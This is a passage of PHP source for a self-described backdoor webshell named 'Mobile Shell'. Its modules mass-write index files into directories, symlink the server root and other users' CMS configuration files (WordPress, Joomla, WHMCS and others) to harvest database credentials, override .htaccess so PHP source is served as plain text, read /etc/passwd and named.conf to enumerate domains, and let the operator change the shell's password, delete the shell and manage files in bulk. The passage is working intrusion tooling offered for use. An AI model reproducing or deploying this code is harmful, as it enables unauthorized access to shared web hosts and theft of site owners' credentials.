  991.                 if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  992.                 {
  993.                         $index = getcwd ()."/".$file."/".$_COEG['file_name'];
  994.                         if (file_put_contents ($index, $_COEG['index']))
  995.                                 echo "
  996.                <div class='coL-option' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span>   $index </span></div>"; }
  997.         endforeach;
  998.     }
  999. }
  1000.  
  1001. // --- md5 creator --- //
  1002. elseif($_COEG['command'] == 'md5') {
  1003. echo('<div class="coL-panel"><table>
  1004. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MD5 CREATOR</td></table></div>');
  1005. if($_COEG['encrypt']) {
  1006. $text = $_COEG['text'];
  1007. $md5 = md5($text);
  1008. if($md5) {
  1009. echo("<div class='coL-option top'><table style='margin-bottom:3px'>
  1010. <td class='td-md5' style='width:60px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$text."</td><tr><td class='td-md5' style='width:60px'><font color='#1D9D73'>+</font> MD5 :</td><td class='break'> ".$md5."</td></table></div>"); } else {
  1011. $alert = 'Permission Denied !!';
  1012. failed($alert);
  1013.     }
  1014. }
  1015. echo("<div class='coL-option top'>
  1016.     <form action='?".x7."md5&".x5.$dir."' method='post'>
  1017. <table style='width:100%'>
  1018.     <td style='width:20%'>Text :</td><td style='width:80%'>
  1019.     <input type='text' name='text' style='width:100%'>
  1020. </td><tr><td style='width:20%'></td><td style='width:80%'>
  1021.     <input type='submit' value='Create' name='encrypt' class='btn-exe' style='width:100px'></td></table></form></div>");
  1022. }
  1023.  
  1024. // --- multi symlink --- //
  1025. elseif($_COEG['command'] == 'symlink') {
  1026. echo '<div class="coL-panel"><table>
  1027. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MULTI SYMLINK</td></table></div>';
  1028. if(is_readable("/etc/named.conf")) {
  1029.     $named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
  1030.     } else {
  1031.     $named = '<font color="red">DISABLED</font>';
  1032. }
  1033. if(is_readable("/etc/valiases")) {
  1034.     $valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
  1035.     } else {
  1036.     $valiases = '<font color="red">DISABLED</font>';
  1037. }
  1038. if(is_readable("/etc/passwd")){
  1039.     $passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
  1040.     } else {
  1041.     $passwd = '<font color="red">DISABLED</font>';
  1042.     }
  1043. if(is_readable("/var/named")){
  1044.     $var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
  1045.     } else {
  1046.     $var = '<font color="red">DISABLED</font>';
  1047.     }  
  1048. echo '<table class="table-info">';
  1049.     echo '<th class="th-info">From</th>';
  1050.     echo '<th class="th-info">Arrow</th>';
  1051.     echo '<th class="th-info">Action</th>';
  1052.     echo '<tr>';
  1053.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$named.'</a></center></td>';
  1054.     echo '<tr>';
  1055.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]</td><td class="td-info""><center>&raquo;</center></td><td class="td-info"><center>'.$valiases.'</a></center></td>';
  1056.     echo '<tr>';
  1057.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$passwd.'</a></center></td>';
  1058.     echo '<tr>';
  1059.     echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$var.'</a></center></td>';
  1060.     echo '</table>';
  1061. @mkdir('pee',0777);
  1062. @symlink("/","pee/root");
  1063. $htaccss = "Options all
  1064. DirectoryIndex Sux.html
  1065. AddType text/plain .php
  1066. AddHandler server-parsed .php
  1067. AddType text/plain .html
  1068. AddHandler txt .html
  1069. Require None
  1070. Satisfy Any";
  1071. file_put_contents("pee/.htaccess",$htaccss);
  1072. $ms_2 = file_get_contents("/etc/passwd");
  1073. $ms_2z = explode("\n",$ms_2);
  1074.    
  1075.     foreach($ms_2z as $ms_3){
  1076. $ms_1 = explode(":",$ms_3);
  1077. error_reporting(0);
  1078.  
  1079. $ms_4 = posix_getcwd();
  1080. $dr = explode("/",$ms_4);
  1081.  
  1082. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1083. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1084. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1085. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1086. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"pee/".$ms_1[0].'-PhpBB.txt');
  1087. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"pee/".$ms_1[0].'-vBulletin.txt');
  1088. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1089. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1090. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1091. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1092. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"pee/".$ms_1[0].'-IPB.txt');
  1093. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"pee/".$ms_1[0].'-MyBB.txt');
  1094. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"pee/".$ms_1[0].'-SMF.txt');
  1095. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"pee/".$ms_1[0].'-Drupal.txt');
  1096. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"pee/".$ms_1[0].'-e107.txt');
  1097. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"pee/".$ms_1[0].'-Seditio.txt');
  1098. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"pee/".$ms_1[0].'-osCommerce.txt');
  1099. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1100. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1101. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1102. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1103. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmcs/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1104. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domain/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1105. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/hosting/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1106. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmc/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1107. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/billing/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1108. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/portal/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1109. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/order/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1110. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientarea/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1111. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domains/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); }
  1112. }
  1113.  
  1114. elseif(isset($_REQUEST['symlink'])){
  1115. switch ($_REQUEST['symlink']){
  1116. case 'var':
  1117. if(is_readable("/var/named")){
  1118. echo '<div class="coL-panel"><table>
  1119. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ VAR/NAMED ]</td></table></div>';
  1120. echo '<table class="table-info">';
  1121. echo '
  1122. <th class="th-info">Website</th>
  1123. <th class="th-info" style="width:60px">User</th>
  1124. <th class="th-info" style="width:40px">Action</th>';
  1125. $ms_5 = scandir("/var/named");
  1126. foreach($ms_5 as $ms_6){
  1127. if(strpos($ms_6,".db")){
  1128. $i += 1;
  1129. $ms_6 = str_replace('.db','',$ms_6);
  1130. $owner = posix_getpwuid(fileowner("/etc/valiases/".$ms_6));
  1131.  
  1132. echo "<tr class='ex-hov'>
  1133. <td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$ms_6." '>".$ms_6."</a></td>
  1134. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
  1135. <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1136.   }
  1137. }
  1138. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1139. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
  1140. }else{ echo "<tr><td class='td-info'>can't read [ /var/named ]</td></table>";
  1141.     }
  1142. break;
  1143. }
  1144.  
  1145. switch ($_REQUEST['symlink']){
  1146. case 'passwd':
  1147. error_reporting(0);
  1148. $etc = file_get_contents("/etc/passwd");
  1149. $etcz = explode("\n",$etc);
  1150. if(is_readable("/etc/passwd")){
  1151. echo '<div class="coL-panel"><table>
  1152. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/PASSWD ]</td></table></div>';
  1153. echo '<table class="table-info">';
  1154. echo '
  1155. <th class="th-info">Website</th>
  1156. <th class="th-info" style="width:60px">User</th>
  1157. <th class="th-info" style="width:40px">Action</th>';
  1158. $list = scandir("/var/named");
  1159. foreach($etcz as $etz){
  1160. $etcc = explode(":",$etz);
  1161. foreach($list as $domain){
  1162. if(strpos($domain,".db")){
  1163. $domain = str_replace('.db','',$domain);
  1164. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1165. if($owner['name'] == $etcc[0]) {
  1166. $i += 1;
  1167. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td>
  1168. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
  1169. <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1170. }}}}
  1171. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1172. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";}
  1173. break;
  1174.     }
  1175.  
  1176. switch ($_REQUEST['symlink']){
  1177. case 'named.conf':
  1178. if(is_readable("/etc/named.conf")){
  1179. echo '<div class="coL-panel"><table>
  1180. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/NAMED.CONF ]</td></table></div>';
  1181. echo '<table class="table-info">';
  1182. echo '
  1183. <th class="th-info">Website</th>
  1184. <th class="th-info" style="width:60px">User</th>
  1185. <th class="th-info" style="width:40px">Action</th>';
  1186. $named = file_get_contents("/etc/named.conf");
  1187. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  1188. foreach($domains[1] as $domain){
  1189. $domain = trim($domain);
  1190. $i += 1;
  1191. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1192. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td><td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1193. }
  1194. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1195. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
  1196. } else { echo "<tr><td class='td-info'>can't read [ /etc/named.conf ]</td></tr>"; }
  1197. break;
  1198. }
  1199. switch ($_REQUEST['symlink']){
  1200. case 'valiases':
  1201. if(is_readable("/etc/valiases")){
  1202. echo '<div class="coL-panel"><table>
  1203. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/VALIASES ]</td></table></div>';
  1204. echo '<table class="table-info">';
  1205. echo '
  1206. <th class="th-info">Website</th>
  1207. <th class="th-info" style="width:60px">User</th>
  1208. <th class="th-info" style="width:40px">Action</th>';
  1209. $list = scandir("/etc/valiases");
  1210. foreach($list as $domain){
  1211. $i += 1;
  1212. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1213. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain."'>".$domain."</a></td><center><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1214. }
  1215. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1216. Total Domain : <font color='#1D9D73'>".$i."</font></div>";
  1217. } else { echo "<tr><td class='td-info'>can't read [ /etc/valiases ]</td></tr>"; }
  1218. break;
  1219.     }
  1220. }
  1221.  
  1222. // --- change password --- //
  1223. elseif($_COEG['command'] == 'change') {
  1224. echo('<div class="coL-panel"><table>
  1225. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
  1226. echo('<script>
  1227. function validate(){
  1228.             var a = document.getElementById("newpass").value;
  1229.            var b = document.getElementById("confirm").value;
  1230.            if (a!=b) {
  1231.               $.alert({
  1232.         icon: "fa fa-code",
  1233.         title: "MOBILE SHELL",
  1234.         content: "Password Do Not Match !!",
  1235.           theme: "Dark",
  1236.           type: "red",
  1237.          });
  1238.               return false;
  1239.     }
  1240. }
  1241.     </script>');
  1242. function xs($file){
  1243.     return file_get_contents($file);
  1244. }
  1245. function chipt($plain){
  1246.         return md5($plain);
  1247. }
  1248. function changepass($plain){
  1249.     $npass = chipt($plain);
  1250.     $npass = "\$pass = \"".$npass."\";";
  1251.     $con = xs($_SERVER['SCRIPT_FILENAME']);
  1252.     $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
  1253.     return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  1254. }
  1255.  
  1256. if($_COEG['newpass']) {
  1257. if(changepass($_COEG['newpass'])) {
  1258. $q1 = 'Password Changed !!';
  1259. $t1 = '?'.x5.$dir.'&'.x7.'logout';
  1260. fauto2($q1, $t1);
  1261. } else {  $alert = "Can't Change Password !!";
  1262. failed1($alert);
  1263.     }
  1264. }
  1265. echo "<div class='coL-option top'>
  1266. <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
  1267. <td style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
  1268. <tr>
  1269. <td style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
  1270. <tr>
  1271. <td style='width:120px'></td><td style='width:75%'>
  1272. <input type='submit' name='cps' class='btn-exe' value='Save' onclick='saveForm();return false;' style='width:100px'></td></table></form></div>";
  1273. echo '<script>function saveForm(){
  1274. if(document.getElementById("newpass").value == ""){
  1275.       $.alert({
  1276.         icon: "fa fa-code",
  1277.         title: "MOBILE SHELL",
  1278.         content: "Enter New Password !!",
  1279.           theme: "Dark",
  1280.           type: "red",
  1281.          });
  1282.      document.getElementById("newpass").focus();
  1283.      return false;
  1284.    }
  1285. if(document.getElementById("confirm").value == ""){
  1286.      $.alert({
  1287.         icon: "fa fa-code",
  1288.         title: "MOBILE SHELL",
  1289.         content: "Confirm Your Password !!",
  1290.           theme: "Dark",
  1291.           type: "red",
  1292.          });
  1293.      return false;
  1294.    }
  1295.    document.getElementById("sks").submit();
  1296.  }
  1297. </script>';
  1298. }
  1299.  
  1300. // --- kill me --- //
  1301. elseif($_COEG['command'] == 'kill') {
  1302. if(file_exists("MOBILE_SHELL.php"))
  1303. unlink("MOBILE_SHELL.php");unlink(__FILE__);
  1304.     $q1 = "Good By Baby :'(";
  1305.     $t1 = "http://underxploit.blogspot.com";
  1306.     fauto2($q1, $t1);
  1307. }
  1308.  
  1309. // --- about me --- //
  1310. elseif($_COEG['command'] == 'about') {
  1311.   echo '<div class="coL-panel"><table>
  1312. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">DESCRIPTION</td></table></div>';
  1313. echo '<div class="coL-option" style="padding:7px">
  1314. &nbsp; &nbsp; Mobile Shell is a shell script backdoor / webshell that I designed specifically for mobile users, you can use this script for hacking activities or just to FileManager for your website.
  1315. <br><br>
  1316. Unlike the other shell is created for PC users if used via mobile phones will be very difficult.
  1317. <br><br>
  1318. The advantages of this script is very easy and more comfortable when in use via mobile phone (Responsive), plus the script is very light.</div>
  1319. <div class="coL-panel top"><table>
  1320. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MEANING OF SYMBOL [ ICON ]</td></table></div>
  1321. <table class="table-info">
  1322. <tr class="ex-hov">
  1323. <td style="width:85px" align="center" class="td-info"><i class="fa fa-eye"></i></td> <td class="td-info">: View Source</td>
  1324. <tr class="ex-hov">
  1325. <td style="width:85px" align="center" class="td-info"><i class="fa fa-pencil"></i></td> <td class="td-info">: Edit Source</td>
  1326. <tr class="ex-hov">
  1327. <td style="width:85px" align="center" class="td-info"><i class="fa fa-edit"></i></td> <td class="td-info">: Change Name [ Rename ]</td>
  1328. <tr class="ex-hov">
  1329. <td style="width:85px" align="center" class="td-info"><i class="fa fa-cogs"></i></td> <td class="td-info">: Chmod [ Change Permission ]</td>
  1330. <tr class="ex-hov">
  1331. <td style="width:85px" align="center" class="td-info"><i class="fa fa-trash"></i></td> <td class="td-info">: Delete</td>
  1332. </table>
  1333.  
  1334. <div class="coL-panel top"><table>
  1335. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MEANING OF SYMBOL [ ALPHABET ]</td></table></div>
  1336. <table class="table-info"><tr class="ex-hov">
  1337. <td style="width:85px" align="center" class="td-info">[ U ]</td> <td class="td-info">: Upload [ In Directory ]</td>
  1338. <tr class="ex-hov">
  1339. <td style="width:85px" align="center" class="td-info">[ R ]</td> <td class="td-info">: Rename</td>
  1340. <tr class="ex-hov">
  1341. <td style="width:85px" align="center" class="td-info">[ D ]</td> <td class="td-info">: Delete</td>
  1342. <tr class="ex-hov">
  1343. <td style="width:85px" align="center" class="td-info">[ ND ]</td> <td class="td-info">: Create New Directory</td>
  1344. <tr class="ex-hov">
  1345. <td style="width:85px" align="center" class="td-info">[ NF ]</td> <td class="td-info">: Create New File</td>
  1346. <tr class="ex-hov">
  1347. <td style="width:85px" align="center" class="td-info">[ OPEN ]</td> <td class="td-info">: Open Properties</td>
  1348. <tr class="ex-hov">
  1349. <td style="width:85px" align="center" class="td-info">[ COPY ]</td> <td class="td-info">: Copy File / Directory</td>
  1350. <tr class="ex-hov">
  1351. <td style="width:85px" align="center" class="td-info">[ MOVE ]</td> <td class="td-info">: Move File / Directory</td>
  1352. <tr class="ex-hov">
  1353. <td style="width:85px" align="center" class="td-info">[ DELETE ]</td> <td class="td-info">: Delete File / Directory</td>
  1354. </table>
  1355. <div class="coL-panel top"><table>
  1356. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CREDITS</td></table></div>
  1357. <table class="table-info">
  1358. <tr class="ex-hov">
  1359. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: Mobile Shell</td>
  1360. <tr class="ex-hov">
  1361. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 0.5 [ 4th Edition ]</td>
  1362. <tr class="ex-hov">
  1363. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Wildan Izzudin</td>
  1364. <tr class="ex-hov">
  1365. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:underxploit@gmail.com">underxploit@gmail.com</a></td>
  1366. <tr class="ex-hov">
  1367. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Facebook</td> <td class="td-info break">:  <a class="a" href="http://www.facebook.com/WILDAN.OFFICIAL">http://fb.me/WILDAN.OFFICIAL</a></td>
  1368. <tr class="ex-hov">
  1369. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="http://underxploit.blogspot.co.id">http://underxploit.blogspot.co.id</a></td></table>
  1370. <div class="coL-option to">
  1371. <center><br>If there is any suggestion or feedback please contact me through the contact above.<br><br><center><br>&mdash; Thank You &mdash;</center></div>';
  1372. }
  1373.  
  1374. // --- logout --- //
  1375. elseif ($_COEG['command'] == 'logout') {   
  1376. r($_SERVER['PHP_SELF']);
  1377. setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
  1378. }  
  1379.  
  1380. // --- mass action --- //
  1381. else {
  1382. $hc = @getcwd();
  1383. if(isset($_COEG['location']))
  1384.     @chdir($_COEG['location']);
  1385. $cwd = @getcwd();
  1386. if($os == 'win') {
  1387.     $hc = str_replace("\\", "/", $hc);
  1388.     $cwd = str_replace("\\", "/", $cwd);
  1389. }
  1390. if($cwd[strlen($cwd)-1] != '/')
  1391.     $cwd .= '/';
  1392.  
  1393. function hs($d) {
  1394.     if(function_exists("scandir")) {
  1395.         return scandir($d);
  1396.     } else {
  1397.         $dh  = opendir($d);
  1398.         while (false !== ($filename = readdir($dh)))
  1399.             $data[] = $filename;
  1400.         return $data;
  1401.     }
  1402. }
  1403.   if(!empty($_COOKIE['msv5']))
  1404.         $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
  1405.      
  1406.     if(!empty($_COEG['hcx'])) {
  1407.         switch($_COEG['hcx']) {
  1408.             case 'mkdir':
  1409.                 if(!@mkdir($_COEG['p2']))
  1410.                     echo "Can't create new dir";
  1411.                 break;
  1412.             case 'delete':
  1413.                 function deleteDir($path) {
  1414.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  1415.                     $dh  = opendir($path);
  1416.                     while ( ($r = readdir($dh) ) !== false) {
  1417.                         $r = $path.$r;
  1418.                         if ( (basename($r) == "..") || (basename($r) == ".") )
  1419.                             continue;
  1420.                         $type = filetype($r);
  1421.                         if ($type == "dir")
  1422.                             deleteDir($r);
  1423.                         else
  1424.                             @unlink($r);
  1425.                     }
  1426.                     closedir($dh);
  1427.                     @rmdir($path);
  1428.                 }
  1429.                 if(is_array(@$_COEG['msv5']))
  1430.                     foreach($_COEG['msv5'] as $f) {
  1431.                         if($f == '..')
  1432.                             continue;
  1433.                         $f = urldecode($f);
  1434.                         if(is_dir($f))
  1435.                             deleteDir($f);
  1436.                         else
  1437.                             @unlink($f);
  1438.                     }
  1439.                 break;
  1440.             case 'paste':
  1441.                 if($_COOKIE['act'] == 'copy') {
  1442.                     function copy_paste($c,$s,$d){
  1443.                         if(is_dir($c.$s)){
  1444.                             mkdir($d.$s);
  1445.                             $h = @opendir($c.$s);
  1446.                             while (($f = @readdir($h)) !== false)
  1447.                                 if (($f != ".") and ($f != ".."))
  1448.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  1449.                         } elseif(is_file($c.$s))
  1450.                             @copy($c.$s, $d.$s);
  1451.                     }
  1452.                     foreach($_COOKIE['msv5'] as $f)
  1453.                         copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
  1454.                 } elseif($_COOKIE['act'] == 'move') {
  1455.                     function move_paste($c,$s,$d){
  1456.                         if(is_dir($c.$s)){
  1457.                             mkdir($d.$s);
  1458.                             $h = @opendir($c.$s);
  1459.                             while (($f = @readdir($h)) !== false)
  1460.                                 if (($f != ".") and ($f != ".."))
  1461.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  1462.                         } elseif(@is_file($c.$s))
  1463.                             @copy($c.$s, $d.$s);
  1464.                     }
  1465.                     foreach($_COOKIE['msv5'] as $f)
  1466.                         @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
  1467.                 } elseif($_COOKIE['act'] == 'zip') {
  1468.                     if(class_exists('ZipArchive')) {
  1469.                         $zip = new ZipArchive();
  1470.                         if ($zip->open($_COEG['p2'], 1)) {
  1471.                             chdir($_COOKIE['location']);
  1472.                             foreach($_COOKIE['msv5'] as $f) {
  1473.                                 if($f == '..')
  1474.                                     continue;
  1475.                                 if(@is_file($_COOKIE['location'].$f))
  1476.                                     $zip->addFile($_COOKIE['location'].$f, $f);
  1477.                                 elseif(@is_dir($_COOKIE['location'].$f)) {
  1478.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
  1479.                                     foreach ($iterator as $key=>$value) {
  1480.                                         $zip->addFile(realpath($key), $key);
  1481.                                     }
  1482.                                 }
  1483.                             }
  1484.                             chdir($GLOBALS['cwd']);
  1485.                             $zip->close();
  1486.                         }
  1487.                     }
  1488.                 } elseif($_COOKIE['act'] == 'unzip') {
  1489.                     if(class_exists('ZipArchive')) {
  1490.                         $zip = new ZipArchive();
  1491.                         foreach($_COOKIE['msv5'] as $f) {
  1492.                             if($zip->open($_COOKIE['location'].$f)) {
  1493.                                 $zip->extractTo($GLOBALS['cwd']);
  1494.                                 $zip->close();
  1495.                             }
  1496.                         }
  1497.                     }
  1498.                 } elseif($_COOKIE['act'] == 'tar') {
  1499.                     chdir($_COOKIE['location']);
  1500.                     $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
  1501.                     ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
  1502.                     chdir($GLOBALS['cwd']);
  1503.                 }
  1504.                 unset($_COOKIE['msv5']);
  1505.                 setcookie('msv5', '', time() - 3600);
  1506.                 break;
  1507.             default:
  1508.                 if(!empty($_COEG['hcx'])) {
  1509.                     vb('act', $_COEG['hcx']);
  1510.                     vb('msv5', serialize(@$_COEG['msv5']));
  1511.                     vb('location', @$_COEG['location']);
  1512.                 }
  1513.                 break;
  1514.         }
  1515.     }
  1516. echo('<script>function m1s(){
  1517. if(document.getElementById("act").value == ""){
  1518.      $.alert ({
  1519.         icon: "fa fa-code",
  1520.         title: "MOBILE SHELL",
  1521.         content: "Select Action !!",
  1522.         theme: "Dark",
  1523.         type: "red",
  1524.         });
  1525.      return false;
  1526.    }
  1527.    document.getElementById("sks").submit();
  1528.  }
  1529. </script>');
  1530. echo('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
  1531. echo('<div class="coL-panel"><table><td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">FILE MANAGER</td></table></div>');
  1532.        
  1533.     $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
  1534.     if($dirContent === false) {    echo 'Can\'t open this folder!';hardFooter(); return; }
  1535.     global $sort;
  1536.     $sort = array('name', 1);
  1537.     if(!empty($_COEG['hcx'])) {
  1538.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
  1539.             $sort = array($match[1], (int)$match[2]);
  1540.     }
  1541. echo('<script language="JavaScript">
  1542. function toggle(source) {
  1543.  checkboxes = document.getElementsByName("msv5[]");
  1544.  for(var i=0, n=checkboxes.length;i<n;i++) {
  1545.    checkboxes[i].checked = source.checked;
  1546.  }
  1547. }
  1548. </script>');
  1549. echo('<table class="table-file" cellspacing="0">
  1550. <th class="th-file">Name</th>
  1551. <th class="th-file" style="width:80px">Size</th>
  1552. <th class="th-file" style="width:65px">Action</th>
  1553. <th class="th-file"></th>
  1554. <tr>');
  1555. $dir = getcwd();
  1556. $scn = scandir($dir);
  1557.         foreach($scn as $dirx) {
  1558.         $dtype = filetype("$dir/$dirx");
  1559.  if(!is_dir("$dir/$dirx")) continue;
  1560.             if($dirx === '..') {
  1561.                 $href = '<a class="a" href="?'.x5.dirname($dir).'">'.$dirx.'</a>';
  1562.             }
  1563. elseif($dirx === '.') {
  1564.                 $href = '<a class="a" href="?'.x5.$dir.'">'.$dirx.'</a>';
  1565.             } else {
  1566.                 $href = '<a class="a" href="?dir='.$dir.'/'.$dirx.'">'.$dirx.'</a>';
  1567.             }
  1568.             if($dirx === '.' || $dirx === '..') {
  1569.                 $d_zx = "<font color='#FF0000'>&mdash;&mdash;</font>";
  1570.                 $ckh = '<input type="checkbox" disabled>';
  1571.             } else {
  1572.                 $d_zx = "<a class='a' href='?command=upload&dir=$dir/$dirx'>U</a> |
